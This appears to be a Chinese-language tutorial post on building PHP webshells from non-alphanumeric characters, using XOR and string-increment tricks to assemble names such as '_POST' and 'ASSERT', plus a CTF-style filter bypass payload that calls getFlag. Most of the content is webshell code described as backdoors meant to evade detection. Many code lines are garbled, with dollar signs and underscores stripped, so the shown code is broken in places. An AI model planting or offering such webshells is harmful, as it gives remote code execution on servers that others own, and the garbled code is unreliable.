【无标题】

构造不包含字母和数字的webshell

<?php

echo "A"^"`";

?>

运行结果为!

我们可以看到，输出的结果是字符"!"。之所以会得到这样的结果，是因为代码中对字符"A"和字符"`"进行了异或操作。在PHP中，两个变量进行异或时，先会将字符串转换成ASCII值，再将ASCII值转换成二进制再进行异或，异或完，又将结果从二进制转换成了ASCII值，再将ASCII值转换成字符串。异或操作有时也被用来交换两个变量的值。

那么什么是异或操作呢

在php中，异或操作是两个二进制数相同时，异或为0，不同为1

比如像上面这个例子

A的ASCII值是65，对应的二进制值是0100 0001

`的ASCII值是96，对应的二进制值是0110 0000

异或的二进制的值是00100001，对应的ASCII值是33，对应的字符串的值就是！了

我们都知道，PHP是弱类型的语言，也就是说在PHP中我们可以不预先声明变量的类型，而直接声明一个变量并进行初始化或赋值操作。正是由于PHP弱类型的这个特点，我们对PHP的变类型进行隐式的转换，并利用这个特点进行一些非常规的操作。如将整型转换成字符串型，将布尔型当作整型，或者将字符串当作函数来处理，下面我们来看一段代码：

<?php

function B(){

echo "Hello Angel_Kitty";

}

$_++;

$__= "?" ^ "}";

$__();

?>

执行结果为：Hello Angel_Kitty

我们一起来分析一下上面这段代码：

$++;这行代码的意思是对变量名为""的变量进行自增操作，在PHP中未定义的变量默认值为null,null==false==0,我们可以在不使用任何数字的情况下,通过对未定义变量的自增操作来得到一个数字。

我们希望使用这种后门创建一些可以绕过检测的并且对我们有用的字符串，如_POST", "system", "call_user_func_array"，或者是任何我们需要的东西。

下面是个非常简单的非数字字母的PHP后门：<?php

@$++; // $ = 1

$=("#"^"|"); // $ = _

$__.=("."^"~"); // _P

$__.=("/"^"`"); // _PO

$__.=("|"^"/"); // _POS

$__.=("{"^"/"); // _POST

{__}[!_\]({__}\[_]); // _POST\[0\](_POST[1]);

?>

异或进行绕过

<?php

include 'flag.php';

if(isset($_GET['code'])){

$code = $_GET['code'];

if(strlen($code)>40){

die("Long.");

}

if(preg_match("/[A-Za-z0-9]+/",$code)){

die("NO.");

}

@eval($code);

}else{

highlight_file(FILE);

}

//$hint = "php function getFlag() to get flag";

?>

直接给出payload:

?code=_="\`{{{"\^"?\<\>/";{$}[]();&_=getFlag

$GET[]();&

<?php

echo "`{{{"^"?<>/";//_GET

?>

利用php语法进行绕过

在处理字符变量的算数运算时，PHP 沿袭了 Perl 的习惯，而非 C 的。例如，在 Perl 中 $a = 'Z'; $a++; 将把 $a 变成'AA'，而在 C 中，a = 'Z'; a++; 将把 a 变成 '['（'Z' 的 ASCII 值是 90，'[' 的 ASCII 值是 91）。注意字符变量只能递增，不能递减，并且只支持纯字母（a-z 和 A-Z）。递增／递减其他字符变量则无效，原字符串没有变化。

也就是说，'a'++ => 'b'，'b'++ => 'c'... 所以，我们只要能拿到一个变量，其值为a，通过自增操作即可获得a-z中所有字符。

那么，如何拿到一个值为字符串'a'的变量呢？

巧了，数组（Array）的第一个字母就是大写A，而且第4个字母是小写a。也就是说，我们可以同时拿到小写和大写A，等于我们就可以拿到a-z和A-Z的所有字母。

在PHP中，如果强制连接数组和字符串的话，数组将被转换成字符串，其值为Array

再取这个字符串的第一个字母，就可以获得'A'了。

利用这个技巧，我编写了如下webshell（因为PHP函数是大小写不敏感的，所以我们最终执行的是ASSERT($POST[])，无需获取小写a）：

<?php

$_=[];

_=@""; // $='Array';

_=['!'=='@']; // _=[0];

___=_; // A

__=_;

__++;++;__++;++;__++;++;__++;++;__++;++;__++;++;__++;++;__++;++;__++;__++;

___.=__; // S

___.=__; // S

__=_;

__++;++;__++;++; // E

___.=__;

__=_;

__++;++;__++;++;__++;++;__++;++;__++;++;__++;++;__++;++;__++;++;$__++; // R

___.=__;

__=_;

__++;++;__++;++;__++;++;__++;++;__++;++;__++;++;__++;++;__++;++;__++;++;$++; // T

___.=__;

ASSERT

$___='';

__=_;

__++;++;__++;++;__++;++;__++;++;__++;++;__++;++;__++;++;$++; // P

____.=__;

__=_;

__++;++;__++;++;__++;++;__++;++;__++;++;__++;++;__++;__++; // O

____.=__;

__=_;

__++;++;__++;++;__++;++;__++;++;__++;++;__++;++;__++;++;__++;++;__++;__++; // S

____.=__;

__=_;

__++;++;__++;++;__++;++;__++;++;__++;++;__++;++;__++;++;__++;++;__++;++;$++; // T

____.=__;

_=$____;

___([]); // ASSERT($POST[]);